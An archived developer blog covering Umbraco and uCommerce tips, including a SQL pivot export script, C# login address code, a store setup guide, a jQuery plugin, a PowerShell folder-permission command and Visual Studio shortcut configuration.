# Tuesday, November 09, 2010

imageIn a follow up to my post yesterday -How to download Umbraco content properties into a crosstab table this is the follow up SQL Script that makes it even easier to download any Umbraco document type into Excel.

This SQL Script is fairly simple, basically what it does is it gets the properties associated with the specified document type and then pivots the values so you end up with a table of data that looks like this:

Id Property 1 Property 2 Property 3 Property n
123 String Int Date xxx

How to use the script

All you need to do is set the parameter "@ContentTypeId" to the document type you want (as in my previous post you can get this by checking out the link on the document type).

Once you set the id, just run the script and voila there's the data.

If you run the code and get "Command(s) completed successfully" then you've not set the id right so double check and try again.

The Script

DECLARE @cols NVARCHAR(max), @ContentTypeId int
SET @ContentTypeId = 1074

SELECT  @cols = STUFF(( 
	SELECT DISTINCT TOP 100 PERCENT
        '],[' 
        + CONVERT(varchar, Name + ' (' + CONVERT(varchar, id) + ')', 255)
    FROM
		dbo.cmsPropertyType
	WHERE
		contentTypeId = @ContentTypeId
    ORDER BY
        '],[' 
        + CONVERT(varchar, Name + ' (' + CONVERT(varchar, id) + ')', 255)
    FOR XML PATH('')
), 1, 2, '') + ']'
--SELECT  @cols

DECLARE @query NVARCHAR(max)
SET @query = N'SELECT Id, ' + @cols + '
FROM
  (
		SELECT
			CONVERT(varchar, t.Name + '' ('' + CONVERT(varchar, t.id) + '')'', 255) As [PropId],
			contentNodeId As [Id],
			ISNULL(dataNvarchar, ISNULL(CONVERT(varchar, dataDate), ISNULL(CONVERT(varchar, dataInt), dataNtext))) As [Value]
		FROM
			dbo.cmsPropertyType t LEFT JOIN dbo.cmsPropertyData d ON t.id = d.propertytypeid
		WHERE
			contentTypeId = ' + CONVERT(varchar, @ContentTypeId) + ' 
) p
PIVOT
(
	MAX(Value) 
	FOR PropId IN ( '+ @cols +' )
) AS pvt
ORDER BY Id ASC'

--PRINT(@query)
EXECUTE(@query)
Tuesday, November 09, 2010 9:16:24 PM (GMT Standard Time, UTC+00:00)  #    Disclaimer  |  Comments [0]  | 
# Tuesday, October 26, 2010

header[1]Probably one of the most common features of an ecommerce systems is to "retrieve my details" when logging in -after all that's why you create an account with the seller isn't it?

Out of the box, uCommerce has XSLT to retrieve the customer's last x addresses but one thing it didn't do was automatically re-assign the customer's details when logging in using the built in Umbraco membership code so we need to work around it ourselves -don't worry, it's not too hard (all the code is below for you).

Background

All customer addresses are stored in the uCommerce_Address table automatically, there should be one unique address per customer however if you're on an earlier release you may find you have several copies of the same address for each customer -this is a bug that's been sorted in v1.0.5.0 so upgrade if you can.

Now you'd be forgiven for thinking that you can just select the address from the uCommerce_Address table and then assign the id to the BillingAddressId property of your purchase order however if you do that, you'll find you get the error:

The UPDATE statement conflicted with the FOREIGN KEY constraint "FK_uCommerce_PurchaseOrder_uCommerce_OrderAddress". 
The conflict occurred in database "CommsReadyCMS", table "dbo.uCommerce_OrderAddress", column 'OrderAddressId'.
The statement has been terminated.

 

You'll get this because there is also a second table involved -uCommerce_OrderAddress. uCommerce_OrderAddress stores the actual address used throughout the order process incase the customer changes an address in the future, the order will always have the correct address.

The Solution

Working around this isn't actually too difficult as mentioned before. The easiest solution is to create a new User Control in Visual Studio (I'll call mine login.ascx) and hook into the LoggedIn event. Once logged in, get the Umbraco member and from that, get the customer's billing address.

There's one caveat that I found with uCommerce and that's the way it gets the address. At the moment, there is a function on customer "GetAddress", this is great however if you check out the code it calls, it actually gets the customer's first address from the database -rather than the last address used. I don't think this is a bug as in most cases the first address you enter is your main address. I'll blog separately about managing a default address within the members section.

The code below however retrieves the most recently added address from the database

Login.ascx

<asp:literal runat="server" ID="litLoggedIn" />
<asp:literal runat="server" ID="litLoggedOut" />
<asp:Login runat="server" id="lgnForm" CssClass="checkout-details" 
	DisplayRememberMe="false" TitleText="" OnLoggedIn="lgnForm_LoggedIn"
	UserNameLabelText="Email Address" />

 

Login.ascx.cs

protected void lgnForm_LoggedIn(object sender, EventArgs e)
{
    //If the user has a basket, wire up the shipping address with their last order details
    var basket = SiteContext.Current.OrderContext.GetBasket(true);
    if (basket != null)
    {
        //Get the customers current order
        var po = basket.PurchaseOrder;
        //Look for a shipping address
        var add = po.GetBillingAddress();
        //We only need to assign the address if there isn't already one assigned to this order
        if (add == null)
        {
            //Get the customer who's just logged in
            var mem = Membership.GetUser(lgnForm.UserName);
            //To be safe check that we have a member
            if (mem != null)
            {
                //Find the customer
                var customer = Customer.ForUmbracoMember(Convert.ToInt32(mem.ProviderUserKey));
                if (customer != null)
                {
                    //Get the customer's most recent address
                    var previousAddress = customer.Addresses.ToList().LastOrDefault(a => a.AddressName == "Billing");
                    //If you want to get the customer's first address just uncomment this line
                    //var previousAddress = customer.GetAddress("Billing");

                    //Populate the billing address with the address)
                    if (previousAddress != null)
                    {
                        OrderAddress address = new OrderAddress
                                {
                                    FirstName = previousAddress.FirstName,
                                    LastName = previousAddress.LastName,
                                    EmailAddress = previousAddress.EmailAddress,
                                    PhoneNumber = previousAddress.PhoneNumber,
                                    MobilePhoneNumber = previousAddress.MobilePhoneNumber,
                                    CompanyName = previousAddress.CompanyName,
                                    Line1 = previousAddress.Line1,
                                    Line2 = previousAddress.Line2,
                                    PostalCode = previousAddress.PostalCode,
                                    City = previousAddress.City,
                                    State = previousAddress.State,
                                    Attention = previousAddress.Attention,
                                    CountryId = previousAddress.CountryId,
                                    AddressName = "Billing",
                                    OrderId = new int?(po.OrderId)
                                };
                        //Store the address in the database
                        address.Save();
                        //Assign the address to the purchase order
                        po.BillingAddressId = new int?(address.OrderAddressId);
                        //Save the purchase order (shopping cart)
                        po.Save();
                    }
                }
            }
        }
    }
}
Tuesday, October 26, 2010 11:31:55 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Wednesday, August 18, 2010

frustration[1]We’ve all done it, you’ve run into a problem while developing which you bash at for a few hours and before you know it, you’ve lost the day, not got anywhere and feel completely frustrated. What’s more, is it’s usually something so screamingly obvious and/or simple that you just know you’ll find the answer on Google.

Rather than pulling your hair out for hours on end, there’s a rather simple rule-of-thumb that you should follow:

If you’re able to bash at it for 30 minutes without feeling you’re getting any closer, you’re probably looking at it from the wrong direction and having someone else’s perspective on the problem will probably answer it within seconds. By walking away from the problem you’re also taking away the pressure and you’ll often find the solution comes to you.

Another advantage of putting a time limit on the issue is it avoids you losing the day and should also mean you’ve explored Google and the lists so when you ask your “friend”, it should stop you getting that annoying lmgtfy response when asking for help (it’s a similar concept to the “wait 1 minute before sending” facility within Outlook).

So the next time you realise something’s taking longer than you think it should, start the timer!

Wednesday, August 18, 2010 4:50:07 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Tuesday, August 17, 2010

ucommerce-logo-symbol[1]I thought seeing as uCommerce is now an actual product I would start to overview an install/configuration of uCommerce assuming no prior knowledge of uCommerce. Firstly, let me start of by saying that once you've got your head around uCommerce and some of it's complexities, you'll find it a fantastic product that makes creating a new ecommerce website as easy as setting up a standard Umbraco website. It is still missing a few features, but you can easily work around these with a bit of custom XSLT/C#.

Ok, back to setting up your first uCommerce website. I've grouped these into what I feel are logical sections but if I've missed something, please let me know.

1. Install the uCommerce Package

If you've not already done so, go to the uCommerce Download page and download the uCommerce package (at time of writing, I'm using 1.0.4.2) and then download the uCommerce Store package (currently 1.0.1.2).

Install the uCommerce package as you do any other package in Umbraco. Once installed you'll be able to install the store package.

Assuming all your permissions on your Umbraco install are correct, refresh your browser and you should have a new section "Commerce". If they're not right, you'll be told to add a few web.config settings.

2. Wire up the catalog

This is the step that I didn’t “do” when we first got started and it turns out it’s one of the most important steps as it joins the uCommerce catalog to the front end.

  1. Go to your Umbraco "Content" section
  2. Right click on the page you would like to be the store's "home" page (in the example store, this would be "Shop")
  3. Click "Manage hostnames" (see figure below)
    Manage Hostnames Context Menu
  4. Enter your hostname (the domain name the site runs on) in the "Domain" box and then choose the default language for the website
    Manage Hostnames screen
  5. Click "Add new Domain" and then "Close this window"
  6. Click the "Commerce" section button (in the bottom left)
  7. Click the little arrow to the left of "Product Catalog"
  8. Left click the relevant catalog (if you've installed the store package this will be "uCommerce")
  9. Select your new domain from the "Host name" drop down list
    Manage Hostnames screen
  10. Click the save disk button in the top left

3. Setup Your Product Definitions

A “Product Definition” is uCommerce’s concept of document types, it allows you to add additional information to the product. If you’re using the uCommerce starter store, you’ll get a couple of product definitions out of the box –software and support. At the moment, you can't add additional properties through the uCommerce back end (i.e. if you wanted to add additional information such as Meta Keywords/Descriptions etc -I'll cover how we got around this in a later post) but there are a number of default the category/product properties (I've put their XML reference in brackets where relevant):

uCommerce Category Properties

  • Image (@image)
  • Display Name (@displayName)
  • Description (@description)

The default XML looks like this:

<category parentCategoryId="" parentCategoryName="" index="0" id="67" name="Software" displayName="Software" displayOnSite="True" description="" image="" />

uCommerce Product Properties

  • SKU (@sku)
  • Internal name
  • Display on web site (@displayOnSite)
  • Allow ordering (@allowOrdering)
  • Thumbnail (@thumbnailImage)
  • Primary image (@primaryImage)
  • Display name (@displayName)
  • Short description (@shortDescription)
  • Long description (@longDescription)

The default XML looks like this (the variants are not standard but are there because they're setup as part of the store package):

<product index="0" sku="100-000-001" displayName="uCommerce 1.0 RTM" shortDescription="uCommerce is a full featured e-commerce platform with content management features powered by Umbraco. Everything you need to build a killer e-commerce solution for your clients!" longDescription="uCommerce is fully integrated with the content management system Umbraco, which provides not only the frontend renderendering enabling you to create beautifully designed stores, but also the back office capabilities where you configure and cuztomize the store to your liking.&#xD;&#xA;&#xD;&#xA;uCommerce_ foundations provide the basis for an e-commerce solution. Each foundation addresses a specific need for providing a full e-commerce solution to your clients. foundations in the box include a Catalog Foundation, a Transactions Foundation, and an Analytics Foundation.&#xD;&#xA;&#xD;&#xA;Each of the foundations within uCommerce_ are fully configurable right in Umbraco. No need to switch between a multitude of tools to manage your stores. It's all available as you would expect in one convenient location." thumbnailImage="1097" primaryImage="1097" allowOrdering="True" isVariant="False" displayOnSite="True" hasVariants="True" price="3495.0000" currency="EUR">
  <variants>
    <product index="0" sku="100-000-001" displayName="Developer Edition" shortDescription="" longDescription="" thumbnailImage="0" primaryImage="0" allowOrdering="False" isVariant="True" displayOnSite="False" hasVariants="False" variantSku="001" price="0.0000" currency="EUR" Downloadable="on" License="Dev" />
    <product index="1" sku="100-000-001" displayName="30 Days Evaluation" shortDescription="" longDescription="" thumbnailImage="0" primaryImage="0" allowOrdering="False" isVariant="True" displayOnSite="False" hasVariants="False" variantSku="002" price="3495.0000" currency="EUR" Downloadable="on" License="Eval" />
    <product index="2" sku="100-000-001" displayName="Go-Live" shortDescription="" longDescription="" thumbnailImage="0" primaryImage="0" allowOrdering="False" isVariant="True" displayOnSite="False" hasVariants="False" variantSku="003" price="3495.0000" currency="EUR" Downloadable="on" License="Live" />
  </variants>
</product>

Adding additional product properties is simple.

  1. Click the "Commerce" section button
  2. Navigate to: Settings --> Catalog --> Product Definitions
  3. Choose the product definition you would like to edit (or create a new one in the same way that you would with Umbraco document types)
  4. Right click the product definition you need to add extra properties to and click "Create"
  5. Type in a name for your new property i.e. Size
  6. Choose the Data Type for the property (if you need something that's not listed see "Creating your own Data Type" below):
    • ShortText -A textbox
    • LongText -A text area
    • Number -Beleive it or not, a numeric value
    • Boolean -A checkbox
    • Image -A media selector
  7. Click the "Create" button
  8. You can now choose a few additional options for the new property including how it should be shown to the user and whether it's Multilingual.
    • Name -the text used as the label in the uCommerce product editor (it's also the name of the attribute on the XML that will contain it's value)
    • Data Type -the type of control to render in the uCommerce product editor
    • Multilingual -whether the control should be shown on the "Common" tab of the uCommerce product editor or the language specific tab
    • Display On Web Site -A flag that's sent out in the XML so you can decide whether or not to show it on the website
    • Variant Property -Whether this should appear as a table column heading under the "Variants" tab (I'll go into variants more in a later post)
      Note: Do not set Multilingual and Variant property to both true as at the moment, it won't be shown in the uCommerce product editor -you've been warned!
    • Render in Editor -Whether the control should be shown in the uCommerce product editor screen or hidden from the administrator (i.e. for data you want to use internally only and should be editable)
  9. Finally you'll need to enter in a Display Name for the various languages. This is what's shown to the user if you dynamically pull through the various properties on the product details page.

4. Creating Your Own Data Type

Now, you may be thinking that using that set of data types is a little limiting for something like "Size" or "Colour" and you might want to display something a little more flexible to the user -such as a drop down list. This is easy enough:

  1. Right click the "Data Types" node
  2. Enter a name i.e. "Size"
  3. Choose the definition for the Data Type (for size we will use "Enum")
  4. Save and Refresh the "Data Types" node
  5. Right click your new Data Type and click Create
  6. Enter your Option's value i.e. "Small"
  7. Repeat 5-6 until all your options are set i.e. add "Medium" and "Large"

Note: At the moment, the enum values cannot be re-ordered through the UI so make sure you add them in the order you want them in the editor!

5. Load Your Catalog

Once you've finished creating your various product types, it's time to create your catalog. Creating categories and products within uCommerce is as simple as creating pages in Umbraco. Using the same right click menu concept you can create nested categories as deep as your catalog requires. You can add products and categories at any level by choosing either the "Category" or "Product" radio button and choosing your product type.

6. You're Done!

Assuming you've followed the steps above, you should now have a (fairly basic) store setup. Go to your site's homepage and click the "uCommerce" menu item and voila, your categories and products should be listed.

Not getting the categories you were expecting? Perform the helpful xsl “copy-of” trick within either the "RootCategories[XSLT].xslt" file or "Category[XSLT].xslt" file:

<pre><xsl:copy-of select="$categories" /></pre>

and then have a look at the output:

<errors><error>No product catalog group found supporting the current URL.</error></errors>

If you're getting the above error, currently (and this may be a misunderstanding/changed later) you have to have the catalog and catalogue group names the same –in the example site, they’re both “uCommerce”.

As I think the concept store offered with Software/Support isn't particularly real-world, I'm going to work on creating a basic store that you can use to better understand uCommerce and it's intricacies.

Check back soon as I'll be posting an overview of the checkout process, the various XSLT files and integrating payment gateways into uCommerce (initially SagePay, PayPoint, WorldPay and PayPal).

Tuesday, August 17, 2010 5:49:45 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [3]  | 
# Thursday, August 12, 2010

Ever needed to take a large list and split it into smaller subsets of data for processing? Well this is the Extension Method for you. Tonight we had to split a small dataset (500 items) into even smaller sets of 10 so the provider’s web service wouldn’t timeout.

Seeing as I was going to miss out on my evening, I thought I’d see if I could do it a little differently using Linq and this is what I came up with:

/// <summary>
/// Simple method to chunk a source IEnumerable into smaller (more manageable) lists
/// </summary>
/// <param name="source">The large IEnumerable to split</param>
/// <param name="chunkSize">The maximum number of items each subset should contain</param>
/// <returns>An IEnumerable of the original source IEnumerable in bite size chunks</returns>
public static IEnumerable<IEnumerable<TSource>> ChunkData<TSource>(this IEnumerable<TSource> source, int chunkSize)
{
    for (int i = 0; i < source.Count(); i += chunkSize)
        yield return source.Skip(i).Take(chunkSize);
} 

It should extend any IEnumerable and allow you to split it into smaller chunks which you can then process to your heart’s content.

Here’s a quick example of it in use:

var list = new List<string>() { "Item 1", "Item 2", "Item 3", "Item 4", "Item 5", "Item 6", "Item 7", "Item 8", "Item 9", "Item 10" };
Console.WriteLine("Original list is {0} items", list.Count);
var chunked = list.ChunkData(3);
Console.WriteLine("Returned the data in {0} subsets", chunked.Count());
int i = 1;
foreach (var subset in chunked)
{
    Console.WriteLine("{0} items are in subset #{1}", subset.Count(), i++);
    int si = 1;
    foreach (var s in subset)
        Console.WriteLine("\t\tItem #{0}: {1}", si++, s);
}

And this will output

Original list is 10 items
Returned the data in 4 subsets
3 items are in subset #1
		Item #1: Item 1
		Item #2: Item 2
		Item #3: Item 3
3 items are in subset #2
		Item #1: Item 4
		Item #2: Item 5
		Item #3: Item 6
3 items are in subset #3
		Item #1: Item 7
		Item #2: Item 8
		Item #3: Item 9
1 items are in subset #4
		Item #1: Item 10

2 lines of code to do all that work -Neat

Thursday, August 12, 2010 9:32:44 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [1]  | 
# Monday, July 12, 2010

jquery-logo_png[1]There are plenty of tutorials around that show you how to show or hide a div with jQuery, you can find a load on Google but I wanted something that was re-usable throughout our projects so I created the addShowHideLink jQuery plugin.

We’ve been using it across a few projects including Crisis Cover for a while now and it’s catered for all our needs. Let me know if there’s any other options you want added.

I’ve not published any of our plug-ins before so forgive me if there are some obvious errors but I figured someone else would find it useful.

What does it do?

Simple: It hides the specified object and adds a link that shows the object when clicked. It also swaps the show text to the specified hide text automatically.

How do I use it?

I’ve kept it as simple as possible but have hopefully given it enough functionality to suit your needs.

Basic Usage

$('#objectToHide').addShowHideLink();

Used with options

$('#objectToHide').addShowHideLink({ 
		linkClass: 'showHideLnk',
		paraClass: 'showHide',
		openClass: 'showHideOpen',
		showText: 'Show Advanced Options',
		hideText: 'Hide Advanced Options',
		linkActions: function(){
			alert('The link was clicked');
		}
	});

 

How do I get it?

I’ve uploaded a more complete example to: http://blogs.thesitedoctor.co.uk/tim/Plugins/addShowHideLink/ so you can get a quick idea of what it does.

You can download the plug-in here.

Thanks to Trevor Morris for his jQuery skeleton starter framework.

Monday, July 12, 2010 8:09:58 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Thursday, June 17, 2010

powershell2xa4[1] If you're not configuring Umbraco through a web installer, you've had your installs in place for years and never checked the permissions or whoever set the permissions up was lazy and gave IIS write access to the entire folder, there will come a time when you want to restrict modify access to just those user(s) who should have access.

You can find a (pretty) complete list of the files/folders that the Umbraco install should have access to here but assigning them across 101 different installs is a PITA . Thanks to a helpful PowerShell script to set folder permissions from PowerShell.nu you can easily automate the process.

For those of you not familiar with PowerShell (like me) complete instructions are below. For the rest, here's the command:

Get-ChildItem -path ##PATH TO YOUR INSTALL## 
| Where { $_.name -eq "Bin" -or $_.name -eq "Config" -or $_.name -eq "Css" -or $_.name -eq "Data" -or $_.name -eq "Masterpages" -or $_.name -eq "Media" -or $_.name -eq "Scripts" -or $_.name -eq "Umbraco" -or $_.name -eq "Umbraco_client" -or $_.name -eq "UserControls" -or $_.name -eq "Xslt" } 
| ForEach {./SetFolderPermission.ps1 -path $_.Fullname -Access "NETWORK SERVICE" -Permission Modify}

 

Instructions:

  1. Save the SetFolderPermission.ps1 script to your server
  2. Open your PowerShell console (I think it's installed by default if not, you can download PowerShell here)
  3. Copy the above PowerShell command into notepad
  4. Update "##PATH TO YOUR INSTALL##" to your Umbraco install
  5. If your IIS install doesn't use NETWORK SERVICE as the default user, update it to your user
  6. Make sure it's all on a single line
  7. Copy/Paste/Run in PowerShell

Bonus

If you're uber lazy and just have a web folder of Umbraco installs you can set the path to the folder of Umbraco installs and use:

Get-ChildItem -path ##PATH TO YOUR FOLDER## -recurse
| Where { $_.name -eq "Bin" -or $_.name -eq "Config" -or $_.name -eq "Css" -or $_.name -eq "Data" -or $_.name -eq "Masterpages" -or $_.name -eq "Media" -or $_.name -eq "Scripts" -or $_.name -eq "Umbraco" -or $_.name -eq "Umbraco_client" -or $_.name -eq "UserControls" -or $_.name -eq "Xslt" } 
| ForEach {./SetFolderPermission.ps1 -path $_.Fullname -Access "NETWORK SERVICE" -Permission Modify}

 

I've not tried this mind you and can't recommend it but hey, it's there if you want it ;)

Thursday, June 17, 2010 2:47:22 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Wednesday, April 21, 2010

This is a great little tip that Andy Higgs shared with me a couple of months ago while we were developing Crisis Cover. If you write jQuery that hides the div when the user has JavaScript enabled, you can avoid the divs all being shown while the page loads by simply adding a class to the body of the page using jQuery and hide it using CSS like so:

<html>
<head></head>
<!-- Reference to jQuery here -->
<body>
<!-- This should be the first bit of code and don't wait until the page has loaded -->
<script type="text/javascript">$('body').addClass('js');</script>
<!-- The rest of your code here -->
<div class="jsHide">
	<p>This paragraph is hidden if the user has JavaScript enabled.</p>
</div>
</body>
</html>

 

Then you just need to add the css:

.js .jsHide

Your divs will now be hidden until you show them with JavaScript. Nice, simple solution to an ever annoying problem.

Note: For my demo to work you'll need to include jQuery

Update: As pointed out by Petr below and Andy Higgs/Trevor Morris, it would be better to target using JavaScript without jQuery and target the body for maximum flexibility (note the space at the front in case there is already a class):

<script type="text/javascript">document.getElementsByTagName('html')[0].className+=' js'</script>
Wednesday, April 21, 2010 10:30:25 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [3]  | 
# Sunday, April 18, 2010

You may have come across this error once or twice while deploying your project if you develop using Web Deployment Projects. It's usually caused when you copy and paste a page and forget to update both the page declaration and code behind file.

But the website builds!?!

You don't usually get the ILMerge error until you build the web deployment project because when you build a website directly, it doesn't compile all the code into a single assembly so the class names are seen as different. Part of the web deployment process is to compile all the websites code into a single assembly hence the duplicate references.

What's the solution?

It's surprisingly simple, all you need to do is open up the offending aspx and aspx.cs files and update two lines:

1. In the code behind file, rename the partial class. By default Visual Studio will name the class FolderName_Pagename which should result in a unique name

2. The page declaration (first line of the page) in the aspx file. You have to make sure that both the Inherits attribute and CodeBehind reference are correct.

Tip: To avoid confusing yourself, open the files independently using the solution browser because if you open the aspx and press F7 to switch to the code behind file before updating the page declaration, you'll end up editing the page you copied rather than the copy.

Sunday, April 18, 2010 12:47:20 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Monday, July 27, 2009

It's taken some time to get here and there's still more to add as I think this is a pretty big topic but I thought I'd get started. I wanted to keep the session more focused on the selling points of Umbraco and how people pitch Umbraco to the clients than selling techniques which on the whole we managed to do.

The first thing I stressed was that I wasn't going to teach you how to sell or selling techniques as I've never found that hard selling works -though I'm not saying it doesn't, I just prefer to educate the client into the most suitable solution (even if that isn't us).

There were a number of questions that were raised and I'll answer what I can here, if you were at the session and I've missed something, please let me know and I'll get it added:

  1. What are the key selling points of Umbraco
  2. How do you pitch Umbraco
  3. Do you tell clients it's open source (or use that as a sales point)?
  4. How do you price Umbraco
  5. Once you've won, what do you ask your client
  6. How do you support Umbraco
  7. How do you get around the question of "What happens if you get hit by a bus?"

What are the key selling points of Umbraco

A couple of the attendees came up with better 30second sales pitches so I'm sure they'll post those up shortly but here's a few I remember:

  • It's easy to use -you don't need any previous computer experience
  • You can edit any page's content yourself at any time
  • It's highly flexible and lightweight
  • It's search engine friendly
  • It's open source (this really can be a selling point at the right time)

Do you tell clients it's open source (or use that as a sales point)?

We do and we don't. Again it really comes down to who you're pitching Umbraco to. Where the client has had issues with developers not releasing source etc then it's clearly a selling point.

Generally we do tend to explain to clients that we will base their website on an open source project that we then build on and customise further to suit their needs and that by using best practice methodologies, any developer can in theory pick up the system and continue to develop it (even if they have no experience of Umbraco).

How do you price Umbraco

This question was asked in a couple of different ways throughout the session and it's a topic in itself (see the article I wrote a while ago about pricing your work).

If you look at Umbraco in the right way you'll see that it's actually rather easy to price as there are a few components that you can sell either individually or together:

  • Installation and configuration
  • Customisation
  • Hosting
  • Support

All you need to do is work out a minimum cost for each component and then that will give you a core system cost.

Once you have your core Umbraco costs (don't forget to factor in your license costs) you can then alter the costs accordingly for your client -and this has to be on a case-by-case basis. 

How do you pitch Umbraco

This is easy, there are so many selling points to Umbraco that regardless of what the client is looking for, as long as it's CMS based, Umbraco will have some benefit you can overview to the client.

When pitching Umbraco, we have found educating the user as to the benefits and what the client should be looking for in other systems. If you do this, then the majority of the time, the rest of the competition falls by the wayside.

If the client is a large corporate it's always worth mentioning that it offers much of the functionality that SharePoint does but with little of the cost (or setup pain!).

Once you've won the contract, what do you ask your client

The first thing to do is to get all the information you need to complete your contract (or at least tell your client what you'll need and when). You should know what you'll need already but we tend to ask for:

  • Design inspiration (websites the client does and doesn't like -and why)
  • Logos and other source imagery
  • Text for the website (you'd be best to load the initial content during training but get the client to think about it while you're developing or you'll never get there!)

Next, you'll need to make sure your paperwork is in order. Once you have agreed the general premise of your contract, it's important that you confirm all deliverables (what you'll be doing for the client) in a work order with the client. This avoids an ambiguity on what you'll be delivering and when. This doesn't need to be pages of text (though sometimes it needs to be) but avoids disagreements later.

You should always request signed work order and deposit (we request a minimum of 20% regardless of project spend) at a minimum before starting any work.

Once you have the signed work order (you sign one for the client to keep and keep one yourself), you can start thinking about the project. If it'll take longer than a week to deliver, I recommend you provide the client with rough timescales, this will have the added benefit of helping you focus your mind.

How do you support Umbraco

This is something that Paul Sterling addressed through another session and if he doesn't write up his notes I'll make a few notes in another post.

How do you get around the question of "What happens if you get hit by a bus?"

Although this was asked a couple of times throughout the session, I avoided answering it a little due to a conflict of interest. For the past few months we've been working hard on a new system called Crisis Cover which has been designed to help you with this exact question.

apple-touch-icon[1] Crisis Cover monitors you to ensure that you're still around and if you don't respond to a number of alerts, it will contact your clients informing there's something wrong.

I'll post more information about Crisis Cover, but if you're interested in getting involved with the beta, leave me your email and I'll get one sent out.

In Closing

There is a lot of information about selling and business in general in my previous post "Business start-up advice" which if you're starting out, I really recommend you reading as it should give you a really good start (and includes example Service Level Agreements, Contracts and other useful documents).

Monday, July 27, 2009 10:53:28 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [0]  | 
# Saturday, June 27, 2009

I've started using Rick Strahl's wwAppConfiguration to allow easier access to application constants and one thing that's been bugging me is that it doesn't play nice with configSource -which we update with web deployment projects to specify Development/Staging/Live settings.

The issue is that when you set configSource on the appSettigns node, wwAppConfiguration doesn't correctly set the file's path and instead (when using the default settings) writes the new values within the <appSettings> node. The problem is then that ASP.Net complains that you cannot specify configSource and settings inside the <appSettings> node.

After a little digging, it turns out that you can use "file" in place of "configSource" for the appSettings node (and sadly only the appSettings node) and it allows you to define values within the <appsettings> node and then override them with your external file. This is fantastic because you can store your "default" values in the web.config and then override some or all of them for your various environments.

The next issue you may run into is if you use web deployment projects, in which case you may get the following error:

web.config(2): error WDP00001: section appSettings in "web.config" has 7 elements but "config\STAGING-appSettings.config" has 19 elements.

To work around this, you just need to untick the "Enforce matching section replacements" checkbox within the properties section and you're good to go!

I hope that helps someone!

Saturday, June 27, 2009 8:19:19 AM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [1]  | 
# Tuesday, April 28, 2009

The Error

For those of you who have tried to rename your Umbraco installation directory to something other than the default /umbraco/ you'll have found that TreeInit.aspx throws a JavaScript error along the lines of:

Message: Object expected
Line: 1
Char: 4236
Code: 0
URI: http://www.yourdomain.co.uk/youradmindirector/js/xloadtree.js

As this only really affects the refresh of the tree/close of a couple of dialogues I've not bothered fixing it but basically the issue is outlined well here: http://tinyurl.com/cx9atv

The Fix

If you're using extension less URLs already then it's easy as pie to sort:

  1. Open your UrlRewriting config file (/config/UrlRewriting.config)
  2. Add this above "</rewrites>":
<...>
<add name="missingjs" 
    virtualUrl="^~/## YOUR ADMIN DIRECTORY GOES HERE ##_client/ui/(.*).js" 
    rewriteUrlParameter="ExcludeFromClientQueryString" 
    destinationUrl="~/umbraco_client/ui/$1.js" 
    ignoreCase="true" />

If you've not already using extension less URLs don't panic, that's easy to setup you can read all about it here. Alternatively you could just copy the js files from one folder to another ;)

The Why

I don't know how many people already rename their admin dir from something else but as Umbraco becomes a more popular choice of CMS you really should consider hiding the folder (the more popular it becomes, the more people will become more familiar with the default admin directory of /umbraco/).

Although there hasn't yet been a breach (AFAIAA) if a vulnerability is found, the first step in prevention is obfuscation -hide your admin directory! A quick Google search will show you how easy some developers have made it for you to find their admin sites.

Tuesday, April 28, 2009 6:49:48 PM (GMT Daylight Time, UTC+01:00)  #    Disclaimer  |  Comments [3]  | 
# Monday, March 02, 2009

A little irritation/time consuming process when you're working with multiple projects on multiple drives/SVN repos/directories is to open the current file's location within Windows Explorer. If you weren't already aware, you can do this from most projects/files by right clicking on the project in the solution browser:

Problem for me (and my mate Chris) is that not only is it just for the Project Item but more importantly it means using the mouse -which is something I'm trying to avoid as much as possible. Then I stumbled across a couple of posts which suggested opening Windows Explorer with Visual Studio's External Tools dialog.

They're both great ideas but you still need to use the mouse so I thought I'd take the final step and wire up some keyboard shortcuts. I'll recap the process here as I've added/grouped a few of their settings.

Creating the "External Tools"

There's a little productivity tip here for setting the folder in question the root of Windows Explorer, this encourages you to focus on just the work in question (though it can be a little irritating sometimes so I may "undo" this change later.

Custom #1: Open the current solution item in Windows Explorer

Title: Windows Explorer - Item
Command: explorer.exe
Arguments: /select,"$(ItemPath)"

Custom #2: Open the current Visual Studio project in Windows Explorer

Title: Windows Explorer - Project Directory
Command: explorer.exe
Arguments: /root,"$(ProjectDir)"

Custom #3: Open the current Visual Studio solution in Windows Explorer

We've got a number of projects that have useful files/folders stored in the same folder as the solution file so this one's useful to get quick access to them, I think I'll use this one a lot when dealing with SVN.

Title: Windows Explorer - Solution Directory
Command: explorer.exe
Arguments: /root,"$(SolutionDir)"

Custom #4: Open the current solution's binary (bin) directory in Windows Explorer

Useful when you want to get access to the dll i.e. to copy to another folder/upload just the dll to a website.

Title: Windows Explorer - Binary Directory
Command: explorer.exe
Arguments: "$(TargetDir)"

Custom #5: Open the current solution's target build directory in Windows Explorer

This is useful when you have a project that builds to another directory (i.e. a common DLL directory, I'm not sure how many people do this but I've got a couple of projects that do this so I thought I'd share it).

Title: Windows Explorer - Target Directory
Command: explorer.exe
Arguments: "$(BinDir)"

In all instances you can leave the Initial Directory field empty.

Note: On a couple of the directory related commands I've set the "/root" argument, this is a useful little productivity tip I learn a while ago to stop you navigating away from your work. Irritatingly I've not found a way of using the /select and /root commands together. It would also be nice to say "Open the bin folder and set the root to the project folder" but again I've not found a way.

If you're interested in the arguments I'm using there, check out the Microsoft Support article about How To Customize the Windows Explorer Views in Windows XP (these also work in Vista). Alternatively you can read more about the Visual Studio macros for build commands here (some of which are global I believe). I'm interested to see the use of $(TargetDir) as although it'll be useful for non-web projects, however using Web Deployment Projects might make it irrelevant for you.

You should now have 5 new items in your Tools' toolbar:

Wire up the keyboard shortcuts

As mentioned earlier, I want keyboard shortcuts but if you want toolbar icons, you should checkout the end of this post.

Open up the Keyboard settings within the Visual Studio Option dialog (Tools -> Options -> Environment -> Keyboard) -you may need to select the "Show all settings" checkbox in the bottom left of the Options dialog to see the Keyboard option.

